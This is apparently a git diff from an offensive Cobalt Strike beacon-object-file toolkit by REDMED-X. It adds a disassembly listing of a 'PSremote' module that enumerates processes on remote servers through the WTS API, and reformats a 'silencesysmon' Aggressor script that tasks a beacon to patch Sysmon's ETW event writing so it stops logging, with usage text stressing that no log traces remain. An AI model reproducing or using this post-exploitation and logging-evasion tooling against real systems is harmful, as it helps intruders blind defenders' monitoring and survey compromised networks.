+  0000000000000230: FF 50 28           call        qword ptr [rax+28h]
+  0000000000000233: 85 C0              test        eax,eax
+  0000000000000235: 7D 02              jge         0000000000000239
+  0000000000000237: EB 3D              jmp         0000000000000276
+  0000000000000239: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000240: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000243: 4C 8D 4C 24 28     lea         r9,[rsp+28h]
+  0000000000000248: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  000000000000024D: 48 8B 54 24 20     mov         rdx,qword ptr [rsp+20h]
+  0000000000000252: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000259: FF 50 18           call        qword ptr [rax+18h]
+  000000000000025C: 85 C0              test        eax,eax
+  000000000000025E: 7D 02              jge         0000000000000262
+  0000000000000260: EB 14              jmp         0000000000000276
+  0000000000000262: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  0000000000000267: 48 8D 15 00 00 00  lea         rdx,[$SG99870]
+                    00
+  000000000000026E: 33 C9              xor         ecx,ecx
+  0000000000000270: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000276: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  000000000000027E: 74 1F              je          000000000000029F
+  0000000000000280: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000287: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000028A: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000291: FF 50 10           call        qword ptr [rax+10h]
+  0000000000000294: 48 C7 05 00 00 00  mov         qword ptr [g_lpStream],0
+                    00 00 00 00 00
+  000000000000029F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  00000000000002A7: 74 18              je          00000000000002C1
+  00000000000002A9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000002B0: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  00000000000002B6: 48 C7 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],0
+                    00 00 00 00 00
+  00000000000002C1: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  00000000000002C7: 74 16              je          00000000000002DF
+  00000000000002C9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000002CF: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  00000000000002D4: 33 D2              xor         edx,edx
+  00000000000002D6: 48 8B C8           mov         rcx,rax
+  00000000000002D9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  00000000000002DF: 48 81 C4 A0 00 00  add         rsp,0A0h
+                    00
+  00000000000002E6: 5F                 pop         rdi
+  00000000000002E7: C3                 ret
+  00000000000002E8: CC                 int         3
+  00000000000002E9: CC                 int         3
+  00000000000002EA: CC                 int         3
+  00000000000002EB: CC                 int         3
+  00000000000002EC: CC                 int         3
+  00000000000002ED: CC                 int         3
+  00000000000002EE: CC                 int         3
+  00000000000002EF: CC                 int         3
+ListProcesses:
+  00000000000002F0: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  00000000000002F5: 48 81 EC 58 02 00  sub         rsp,258h
+                    00
+  00000000000002FC: C7 44 24 38 00 00  mov         dword ptr [rsp+38h],0
+                    00 00
+  0000000000000304: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  000000000000030C: 48 8D 44 24 38     lea         rax,[rsp+38h]
+  0000000000000311: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000316: 4C 8D 4C 24 40     lea         r9,[rsp+40h]
+  000000000000031B: 41 B8 01 00 00 00  mov         r8d,1
+  0000000000000321: 33 D2              xor         edx,edx
+  0000000000000323: 48 8B 8C 24 60 02  mov         rcx,qword ptr [rsp+260h]
+                    00 00
+  000000000000032B: FF 15 00 00 00 00  call        qword ptr [__imp_WTSAPI32$WTSEnumerateProcessesA]
+  0000000000000331: 85 C0              test        eax,eax
+  0000000000000333: 75 1B              jne         0000000000000350
+  0000000000000335: 48 8D 15 00 00 00  lea         rdx,[$SG99888]
+                    00
+  000000000000033C: B9 0D 00 00 00     mov         ecx,0Dh
+  0000000000000341: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000347: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  000000000000034B: E9 CE 00 00 00     jmp         000000000000041E
+  0000000000000350: 48 8D 0D 00 00 00  lea         rcx,[$SG99889]
+                    00
+  0000000000000357: E8 00 00 00 00     call        BeaconPrintToStreamW
+  000000000000035C: 48 8D 0D 00 00 00  lea         rcx,[$SG99890]
+                    00
+  0000000000000363: E8 00 00 00 00     call        BeaconPrintToStreamW
+  0000000000000368: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  0000000000000370: EB 0A              jmp         000000000000037C
+  0000000000000372: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  0000000000000376: FF C0              inc         eax
+  0000000000000378: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000037C: 8B 44 24 38        mov         eax,dword ptr [rsp+38h]
+  0000000000000380: 39 44 24 30        cmp         dword ptr [rsp+30h],eax
+  0000000000000384: 0F 83 82 00 00 00  jae         000000000000040C
+  000000000000038A: 48 63 44 24 30     movsxd      rax,dword ptr [rsp+30h]
+  000000000000038F: 48 6B C0 18        imul        rax,rax,18h
+  0000000000000393: 48 8B 4C 24 40     mov         rcx,qword ptr [rsp+40h]
+  0000000000000398: 48 8B 44 01 08     mov         rax,qword ptr [rcx+rax+8]
+  000000000000039D: 48 89 44 24 48     mov         qword ptr [rsp+48h],rax
+  00000000000003A2: C7 44 24 28 00 01  mov         dword ptr [rsp+28h],100h
+                    00 00
+  00000000000003AA: 48 8D 44 24 50     lea         rax,[rsp+50h]
+  00000000000003AF: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000003B4: 41 B9 FF FF FF FF  mov         r9d,0FFFFFFFFh
+  00000000000003BA: 4C 8B 44 24 48     mov         r8,qword ptr [rsp+48h]
+  00000000000003BF: 33 D2              xor         edx,edx
+  00000000000003C1: 33 C9              xor         ecx,ecx
+  00000000000003C3: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$MultiByteToWideChar]
+  00000000000003C9: 48 63 44 24 30     movsxd      rax,dword ptr [rsp+30h]
+  00000000000003CE: 48 6B C0 18        imul        rax,rax,18h
+  00000000000003D2: 48 63 4C 24 30     movsxd      rcx,dword ptr [rsp+30h]
+  00000000000003D7: 48 6B C9 18        imul        rcx,rcx,18h
+  00000000000003DB: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  00000000000003E0: 44 8B 0C 02        mov         r9d,dword ptr [rdx+rax]
+  00000000000003E4: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  00000000000003E9: 44 8B 44 08 04     mov         r8d,dword ptr [rax+rcx+4]
+  00000000000003EE: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000003F3: 48 8D 0D 00 00 00  lea         rcx,[$SG99891]
+                    00
+  00000000000003FA: E8 00 00 00 00     call        BeaconPrintToStreamW
+  00000000000003FF: C7 44 24 34 01 00  mov         dword ptr [rsp+34h],1
+                    00 00
+  0000000000000407: E9 66 FF FF FF     jmp         0000000000000372
+  000000000000040C: 48 8B 8C 24 60 02  mov         rcx,qword ptr [rsp+260h]
+                    00 00
+  0000000000000414: FF 15 00 00 00 00  call        qword ptr [__imp_WTSAPI32$WTSCloseServer]
+  000000000000041A: 8B 44 24 34        mov         eax,dword ptr [rsp+34h]
+  000000000000041E: 48 81 C4 58 02 00  add         rsp,258h
+                    00
+  0000000000000425: C3                 ret
+  0000000000000426: CC                 int         3
+  0000000000000427: CC                 int         3
+  0000000000000428: CC                 int         3
+  0000000000000429: CC                 int         3
+  000000000000042A: CC                 int         3
+  000000000000042B: CC                 int         3
+  000000000000042C: CC                 int         3
+  000000000000042D: CC                 int         3
+  000000000000042E: CC                 int         3
+  000000000000042F: CC                 int         3
+go:
+  0000000000000430: 89 54 24 10        mov         dword ptr [rsp+10h],edx
+  0000000000000434: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000439: 48 83 EC 58        sub         rsp,58h
+  000000000000043D: C7 44 24 24 00 00  mov         dword ptr [rsp+24h],0
+                    00 00
+  0000000000000445: 48 C7 44 24 28 00  mov         qword ptr [rsp+28h],0
+                    00 00 00
+  000000000000044E: C7 44 24 20 00 00  mov         dword ptr [rsp+20h],0
+                    00 00
+  0000000000000456: 44 8B 44 24 68     mov         r8d,dword ptr [rsp+68h]
+  000000000000045B: 48 8B 54 24 60     mov         rdx,qword ptr [rsp+60h]
+  0000000000000460: 48 8D 4C 24 38     lea         rcx,[rsp+38h]
+  0000000000000465: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataParse]
+  000000000000046B: 48 8D 54 24 24     lea         rdx,[rsp+24h]
+  0000000000000470: 48 8D 4C 24 38     lea         rcx,[rsp+38h]
+  0000000000000475: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconDataExtract]
+  000000000000047B: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  0000000000000480: 48 8B 4C 24 30     mov         rcx,qword ptr [rsp+30h]
+  0000000000000485: FF 15 00 00 00 00  call        qword ptr [__imp_WTSAPI32$WTSOpenServerA]
+  000000000000048B: 48 89 44 24 28     mov         qword ptr [rsp+28h],rax
+  0000000000000490: 48 8B 4C 24 28     mov         rcx,qword ptr [rsp+28h]
+  0000000000000495: E8 00 00 00 00     call        ListProcesses
+  000000000000049A: 89 44 24 20        mov         dword ptr [rsp+20h],eax
+  000000000000049E: 83 7C 24 20 00     cmp         dword ptr [rsp+20h],0
+  00000000000004A3: 75 18              jne         00000000000004BD
+  00000000000004A5: 48 8D 15 00 00 00  lea         rdx,[$SG99908]
+                    00
+  00000000000004AC: B9 0D 00 00 00     mov         ecx,0Dh
+  00000000000004B1: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000004B7: 33 C0              xor         eax,eax
+  00000000000004B9: EB 18              jmp         00000000000004D3
+  00000000000004BB: EB 14              jmp         00000000000004D1
+  00000000000004BD: E8 00 00 00 00     call        BeaconOutputStreamW
+  00000000000004C2: 48 8D 15 00 00 00  lea         rdx,[$SG99909]
+                    00
+  00000000000004C9: 33 C9              xor         ecx,ecx
+  00000000000004CB: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  00000000000004D1: 33 C0              xor         eax,eax
+  00000000000004D3: 48 83 C4 58        add         rsp,58h
+  00000000000004D7: C3                 ret
+
+  Summary
+
+          38 .chks64
+         1E1 .data
+          80 .debug$S
+          5D .drectve
+          30 .pdata
+         4D8 .text$mn
+          24 .xdata

BIN
KIT/PSremote/psremote.o


+ 10 - 10
KIT/SilenceSysmon/silencesysmon.cna

@@ -1,29 +1,29 @@
 # author REDMED-X
 
 beacon_command_register(
-	"silencesysmon", "Silence Sysmon by patching its capability to write ETW events to the log.\n",
-	"INFO:\nSilence the Sysmon service by patching its capability to write ETW events to the log.\nRestarting the Sysmon service or the system itself will clear the patch and Sysmon will resume working normally.\nAltough this will not leave any traces in the log, there will be a time gap between the last and first new event.\n\nOPTIONS:\n[pid]: the process ID of the Sysmon service running on the system.\n\n" .
-	"USAGE:\nsilencesysmon <sysmon pid>\n\n");
+    "silencesysmon", "Silence Sysmon by patching its capability to write ETW events to the log.\n",
+    "INFO:\nSilence the Sysmon service by patching its capability to write ETW events to the log.\nRestarting the Sysmon service or the system itself will clear the patch and Sysmon will resume working normally.\nAltough this will not leave any traces in the log, there will be a time gap between the last and first new event.\n\nOPTIONS:\n[pid]: the process ID of the Sysmon service running on the system.\n\n" .
+    "USAGE:\nsilencesysmon <sysmon pid>\n\n");
 
 
 alias silencesysmon {
     $bid = $1;
     $pid = $2;
 
-	if ($pid eq "") {
-		berror($bid, "Please specify the process ID of the Sysmon service.\n");
-		return;
-	}
-	
+    if ($pid eq "") {
+        berror($bid, "Please specify the process ID of the Sysmon service.\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("silencesysmon.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "i", $pid);
 
-	blog($bid, "Tasked to silence Sysmon..");
+    blog($bid, "Tasked to silence Sysmon..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }